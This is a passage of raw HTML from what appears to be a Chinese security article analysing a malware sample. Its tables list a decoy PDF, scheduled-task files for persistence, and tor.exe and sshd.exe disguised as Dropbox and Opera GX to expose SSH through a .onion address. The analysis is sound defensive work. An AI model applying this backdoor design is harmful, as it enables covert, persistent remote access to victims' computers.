src="https://wechat2rss.xlab.app/img-proxy/?k=aa2a75f7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXLzCFwauZxjxWMJibCxwcuibX4dX45yeV4McdP7iac1VDVibnRdUnxjJpL8ACHEKiabvLMibVaK1sBOTBgvicCjdGY6LMtjamSoAxiaOAc%2F640%3Fwx_fmt%3Dpng"/></span></p><p style="text-indent: 2em;margin-bottom: 16px;margin-top: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">为了方便阐述，这里先把该目录中所有的文件功能都列举出来。</span></p><p><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-weight: bold;">1）核心控制与启动</span></span></p><table style="margin-left:0.0;border:none;mso-cellspacing:1.5pt;border-top:solid windowtext 1.0pt;mso-border-top-alt:solid windowtext 0.5pt;border-left:solid windowtext 1.0pt;mso-border-left-alt:solid windowtext 0.5pt;border-bottom:solid windowtext 1.0pt;mso-border-bottom-alt:solid windowtext 0.5pt;border-right:solid windowtext 1.0pt;mso-border-right-alt:solid windowtext 0.5pt;mso-padding-alt:0pt 0pt 0pt 0pt;width:573px;"><tbody><tr style="height:28.35pt;"><td data-colwidth="201" width="201" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;height: 28.35pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;line-height: 150%;"><strong style="font-weight: bold;mso-bidi-font-weight: bold;font-size: 9.0pt;line-height: 150%;mso-bidi-font-size: 9.0pt;font-family: 宋体;mso-ascii-font-family: 宋体;mso-bidi-font-family: Arial;font-variant: normal;text-transform: none;color: #1F1F1F;"><span leaf="" mpa-font-style="mo2lmzqw11tx" style="font-size: 14px;" data-mpa-action-id="mo2lmzrak1u" data-pm-slice="0 0 []">文件名</span></strong></p></td><td data-colwidth="110" width="110" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;height: 28.35pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;line-height: 150%;"><strong style="font-weight: bold;mso-bidi-font-weight: bold;font-size: 9.0pt;line-height: 150%;mso-bidi-font-size: 9.0pt;font-family: 宋体;mso-ascii-font-family: 宋体;mso-bidi-font-family: Arial;font-variant: normal;text-transform: none;color: #1F1F1F;"><span leaf="" mpa-font-style="mo2ln2961uqv" style="font-size: 14px;" data-mpa-action-id="mo2ln29jm0r" data-pm-slice="0 0 []">功能</span></strong></p></td><td data-colwidth="262" width="241" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;height: 28.35pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;line-height: 150%;"><strong style="font-weight: bold;mso-bidi-font-weight: bold;font-size: 9.0pt;line-height: 150%;mso-bidi-font-size: 9.0pt;font-family: 宋体;mso-ascii-font-family: 宋体;mso-bidi-font-family: Arial;font-variant: normal;text-transform: none;color: #1F1F1F;"><span leaf="" mpa-font-style="mo2ln4fbew4" style="font-size: 14px;" data-mpa-action-id="mo2ln4fogys" data-pm-slice="0 0 []">详细说明</span></strong></p></td></tr><tr style="height:51.55pt;"><td data-colwidth="201" width="201" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;height: 51.55pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;line-height: 150%;"><span style="font-size:9.0pt;line-height:150%;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;font-weight:bold;mso-bidi-font-weight:bold;"><span leaf="" mpa-font-style="mo2lnpgt1afj" style="font-size: 14px;" data-mpa-action-id="mo2lnph823wp" data-pm-slice="0 0 []">currentSessionTrigger</span></span></p></td><td data-colwidth="110" width="110" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;height: 51.55pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;margin-top: 0.0pt;margin-bottom: 0.0pt;line-height: 150%;" data-mpa-action-id="mo2lpj0z1j3b" data-pm-slice="0 0 []"><span style="mso-style-name: &#39;citation-321&#39;;font-size: 9.0pt;line-height: 150%;mso-bidi-font-size: 9.0pt;font-family: 宋体;mso-ascii-font-family: 宋体;mso-bidi-font-family: Arial;font-variant: normal;text-transform: none;color: #1F1F1F;font-weight: bold;mso-bidi-font-weight: bold;"><span leaf="" mpa-font-style="mo2lpj0l1yo0" style="font-size: 14px;">恶意载荷主控脚本</span></span><span style="mso-style-name: &#39;citation-321&#39;;font-size: 9.0pt;line-height: 150%;mso-bidi-font-size: 9.0pt;font-family: 宋体;mso-ascii-font-family: 宋体;mso-fareast-font-family: 宋体;mso-bidi-font-family: Arial;font-variant: normal;text-transform: none;color: #1F1F1F;"><span leaf="" mpa-font-style="mo2lpj0l1dum" style="font-size: 14px;"> (Payload)</span></span></p></td><td data-colwidth="262" width="241" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;height: 51.55pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;margin-top: 0.0pt;margin-bottom: 0.0pt;"><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;"><span leaf="">攻击的核心控制逻辑。负责环境检测、展示诱饵 PDF、注册计划任务以实现持久化，并启动 Tor 和 SSH 服务。</span></span></p></td></tr><tr><td data-colwidth="201" width="201" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;line-height: 150%;"><span style="font-size:9.0pt;line-height:150%;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;font-weight:bold;mso-bidi-font-weight:bold;"><span leaf="" mpa-font-style="mo2lnrx5238h" style="font-size: 14px;" data-mpa-action-id="mo2lnrxi1oef" data-pm-slice="0 0 []">Iskhod_7582_...pdf</span></span></p></td><td data-colwidth="110" width="110" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;margin-top: 0.0pt;margin-bottom: 0.0pt;line-height: 150%;" data-mpa-action-id="mo2lpobp24vi" data-pm-slice="0 0 []"><span style="mso-style-name: &#39;citation-320&#39;;font-size: 9.0pt;line-height: 150%;mso-bidi-font-size: 9.0pt;font-family: 宋体;mso-ascii-font-family: 宋体;mso-bidi-font-family: Arial;font-variant: normal;text-transform: none;color: #1F1F1F;font-weight: bold;mso-bidi-font-weight: bold;"><span leaf="" mpa-font-style="mo2lpobc215n" style="font-size: 14px;">诱饵文档</span></span><span style="mso-style-name: &#39;citation-320&#39;;font-size: 9.0pt;line-height: 150%;mso-bidi-font-size: 9.0pt;font-family: 宋体;mso-ascii-font-family: 宋体;mso-fareast-font-family: 宋体;mso-bidi-font-family: Arial;font-variant: normal;text-transform: none;color: #1F1F1F;"><span leaf="" mpa-font-style="mo2lpobc1vn4" style="font-size: 14px;"> (Decoy)</span></span></p></td><td data-colwidth="262" width="241" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;margin-top: 0.0pt;margin-bottom: 0.0pt;"><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;"><span leaf="">正常的 PDF 文件。脚本运行后会将其打开给用户看，以掩盖恶意软件正在后台安装的事实。</span></span></p></td></tr><tr><td data-colwidth="201" width="201" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;line-height: 150%;"><span style="font-size:9.0pt;line-height:150%;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;font-weight:bold;mso-bidi-font-weight:bold;"><span leaf="" mpa-font-style="mo2lnv3110c4" style="font-size: 14px;" data-mpa-action-id="mo2lnv3b2oq" data-pm-slice="0 0 []">externalCustomerDate.xml</span></span></p></td><td data-colwidth="110" width="110" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;margin-top: 0.0pt;margin-bottom: 0.0pt;line-height: 150%;" data-mpa-action-id="mo2lprbj1wo1" data-pm-slice="0 0 []"><span style="mso-style-name: &#39;citation-319&#39;;font-size: 9.0pt;line-height: 150%;mso-bidi-font-size: 9.0pt;font-family: 宋体;mso-ascii-font-family: 宋体;mso-bidi-font-family: Arial;font-variant: normal;text-transform: none;color: #1F1F1F;font-weight: bold;mso-bidi-font-weight: bold;"><span leaf="" mpa-font-style="mo2lprb6ucd" style="font-size: 14px;">计划任务配置</span></span><span style="mso-style-name: &#39;citation-319&#39;;font-size: 9.0pt;line-height: 150%;mso-bidi-font-size: 9.0pt;font-family: 宋体;mso-ascii-font-family: 宋体;mso-fareast-font-family: 宋体;mso-bidi-font-family: Arial;font-variant: normal;text-transform: none;color: #1F1F1F;"><span leaf="" mpa-font-style="mo2lprb64vj" style="font-size: 14px;"> (SSH)</span></span></p></td><td data-colwidth="262" width="241" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;margin-top: 0.0pt;margin-bottom: 0.0pt;" data-mpa-action-id="mo2lmbpb13lu" data-pm-slice="0 0 []"><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;"><span leaf="" mpa-font-style="mo2lmbot17ze" style="font-size: 12px;">用于注册名为 </span></span><span mpa-font-style="mo2lmbotj3e" style="font-size: 12px;"><span style="font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;font-variant:normal;text-transform:none;color:#1F1F1F;"><span leaf="">OperagxRepairTask</span></span><span style="font-family: 宋体;font-variant: normal;text-transform: none;color: rgb(31, 31, 31);"><span leaf=""> 的任务，确保 </span></span><span style="font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;font-variant:normal;text-transform:none;color:#1F1F1F;"><span leaf="">operagx.exe</span></span></span><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;"><span leaf="" mpa-font-style="mo2lmbot1v1y" style="font-size: 12px;"> (SSH) 在开机/登录时自动运行。</span></span></p></td></tr><tr style="height:20.25pt;"><td data-colwidth="201" width="201" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;height: 20.25pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;line-height: 150%;"><span style="font-size:9.0pt;line-height:150%;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;font-weight:bold;mso-bidi-font-weight:bold;"><span leaf="" mpa-font-style="mo2lnmrt16w1" style="font-size: 14px;" data-mpa-action-id="mo2lnms71nll" data-pm-slice="0 0 []">previousAdminResult.xml</span></span></p></td><td data-colwidth="110" width="110" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;height: 20.25pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;margin-top: 0.0pt;margin-bottom: 0.0pt;line-height: 150%;" data-mpa-action-id="mo2lpg2icww" data-pm-slice="0 0 []"><span style="mso-style-name: &#39;citation-318&#39;;font-size: 9.0pt;line-height: 150%;mso-bidi-font-size: 9.0pt;font-family: 宋体;mso-ascii-font-family: 宋体;mso-bidi-font-family: Arial;font-variant: normal;text-transform: none;color: #1F1F1F;font-weight: bold;mso-bidi-font-weight: bold;"><span leaf="" mpa-font-style="mo2lpg25226n" style="font-size: 14px;">计划任务配置</span></span><span style="mso-style-name: &#39;citation-318&#39;;font-size: 9.0pt;line-height: 150%;mso-bidi-font-size: 9.0pt;font-family: 宋体;mso-ascii-font-family: 宋体;mso-fareast-font-family: 宋体;mso-bidi-font-family: Arial;font-variant: normal;text-transform: none;color: #1F1F1F;"><span leaf="" mpa-font-style="mo2lpg251dpb" style="font-size: 14px;"> (Tor)</span></span></p></td><td data-colwidth="262" width="241" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;height: 20.25pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;margin-top: 0.0pt;margin-bottom: 0.0pt;" data-mpa-action-id="mo2lmgum1wqp" data-pm-slice="0 0 []"><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;"><span leaf="" mpa-font-style="mo2lmgu816r3" style="font-size: 12px;">用于注册名为 </span></span><span mpa-font-style="mo2lmgu81fwc" style="font-size: 12px;"><span style="font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;font-variant:normal;text-transform:none;color:#1F1F1F;"><span leaf="">DropboxRepairTask</span></span><span style="font-family: 宋体;font-variant: normal;text-transform: none;color: rgb(31, 31, 31);"><span leaf=""> 的任务，确保 </span></span><span style="font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;font-variant:normal;text-transform:none;color:#1F1F1F;"><span leaf="">dropbox.exe</span></span></span><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;"><span leaf="" mpa-font-style="mo2lmgu8wc3" style="font-size: 12px;"> (Tor) 在开机/登录时自动运行。</span></span></p></td></tr></tbody></table><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;margin-top: 8.15pt;mso-para-margin-top: 0.5gd;margin-bottom: 10.0pt;line-height: 150%;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-weight: bold;">2）伪装的服务端程序 (Executables)</span></span></p><table style="margin-left:0.0;border:none;mso-cellspacing:1.5pt;mso-border-top-alt:none;mso-border-left-alt:none;mso-border-bottom-alt:none;mso-border-right-alt:none;mso-padding-alt:0pt 0pt 0pt 0pt;width:576px;"><tbody><tr><td data-colwidth="120" width="120" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;line-height: 150%;"><strong style="font-weight: bold;mso-bidi-font-weight: bold;font-size: 10.5pt;line-height: 150%;mso-bidi-font-size: 10.5pt;font-family: 宋体;mso-ascii-font-family: 宋体;mso-bidi-font-family: Arial;font-variant: normal;text-transform: none;color: #1F1F1F;"><span leaf="">文件名</span></strong></p></td><td data-colwidth="139" width="139" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;line-height: 150%;"><strong style="font-weight: bold;mso-bidi-font-weight: bold;font-size: 10.5pt;line-height: 150%;mso-bidi-font-size: 10.5pt;font-family: 宋体;mso-ascii-font-family: 宋体;mso-bidi-font-family: Arial;font-variant: normal;text-transform: none;color: #1F1F1F;"><span leaf="">真实身份</span></strong></p></td><td data-colwidth="91" width="91" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;line-height: 150%;"><strong style="font-weight: bold;mso-bidi-font-weight: bold;font-size: 10.5pt;line-height: 150%;mso-bidi-font-size: 10.5pt;font-family: 宋体;mso-ascii-font-family: 宋体;mso-bidi-font-family: Arial;font-variant: normal;text-transform: none;color: #1F1F1F;"><span leaf="">伪装对象</span></strong></p></td><td data-colwidth="226" width="201" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;line-height: 150%;"><strong style="font-weight: bold;mso-bidi-font-weight: bold;font-size: 10.5pt;line-height: 150%;mso-bidi-font-size: 10.5pt;font-family: 宋体;mso-ascii-font-family: 宋体;mso-bidi-font-family: Arial;font-variant: normal;text-transform: none;color: #1F1F1F;"><span leaf="">功能说明</span></strong></p></td></tr><tr><td data-colwidth="120" width="120" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;line-height: 150%;"><span style="font-size:9.0pt;line-height:150%;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;font-weight:bold;mso-bidi-font-weight:bold;"><span leaf="" mpa-font-style="mo2lny01pnw" style="font-size: 14px;" data-mpa-action-id="mo2lny0d19xv" data-pm-slice="0 0 []">dropbox.exe</span></span></p></td><td data-colwidth="139" width="139" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;line-height: 150%;" data-mpa-action-id="mo2losvj5tc" data-pm-slice="0 0 []"><span style="mso-bookmark:_Hlk220431570;"><span style="font-size:9.0pt;line-height:150%;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;font-weight:bold;mso-bidi-font-weight:bold;"><span leaf="" mpa-font-style="mo2losv51xph" style="font-size: 14px;">Tor</span></span></span><span mpa-font-style="mo2losv517o9" style="font-size: 14px;"><span style="line-height: 150%;font-family: 宋体;font-variant: normal;text-transform: none;color: rgb(31, 31, 31);font-weight: bold;"><span leaf="">服务端</span></span><span style="line-height: 150%;font-family: 宋体;font-variant: normal;text-transform: none;color: rgb(31, 31, 31);"><span leaf="">(</span></span><code style="line-height: 150%;font-family: 宋体;font-variant: normal;text-transform: none;color: rgb(68, 71, 70);"><span leaf="">tor.exe</span></code></span><span style="font-size:9.0pt;line-height:150%;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;"><span leaf="" mpa-font-style="mo2losv5lk1" style="font-size: 14px;">)</span></span></p></td><td data-colwidth="91" width="91" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;margin-top: 0.0pt;margin-bottom: 0.0pt;"><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;font-variant:normal;text-transform:none;"><span leaf="">Dropbox 云盘</span></span></p></td><td data-colwidth="226" width="201" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;margin-top: 0.0pt;margin-bottom: 0.0pt;"><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;"><span leaf="">负责连接Tor。读取 </span></span><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;font-variant:normal;text-transform:none;color:#1F1F1F;"><span leaf="">statusMap</span></span><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;"><span leaf=""> 配置，将本地端口映射到 </span></span><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;font-variant:normal;text-transform:none;color:#1F1F1F;"><span leaf="">.onion</span></span><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;"><span leaf=""> 域名。</span></span></p></td></tr><tr><td data-colwidth="120" width="120" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;line-height: 150%;"><span style="font-size:9.0pt;line-height:150%;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;font-weight:bold;mso-bidi-font-weight:bold;"><span leaf="" mpa-font-style="mo2lo1p01kk0" style="font-size: 14px;" data-mpa-action-id="mo2lo1pdtwq" data-pm-slice="0 0 []">operagx.exe</span></span></p></td><td data-colwidth="139" width="139" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;line-height: 150%;" data-mpa-action-id="mo2lovja1vwe" data-pm-slice="0 0 []"><span style="font-size:9.0pt;line-height:150%;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;font-weight:bold;mso-bidi-font-weight:bold;"><span leaf="" mpa-font-style="mo2loviwyc1" style="font-size: 14px;">SSH 服务端</span></span><span mpa-font-style="mo2loviw35v" style="font-size: 14px;"><span style="line-height: 150%;font-family: 宋体;font-variant: normal;text-transform: none;color: rgb(31, 31, 31);"><span leaf=""> (</span></span><code style="line-height: 150%;font-family: 宋体;font-variant: normal;text-transform: none;color: rgb(68, 71, 70);"><span leaf="">sshd.exe</span></code></span><span 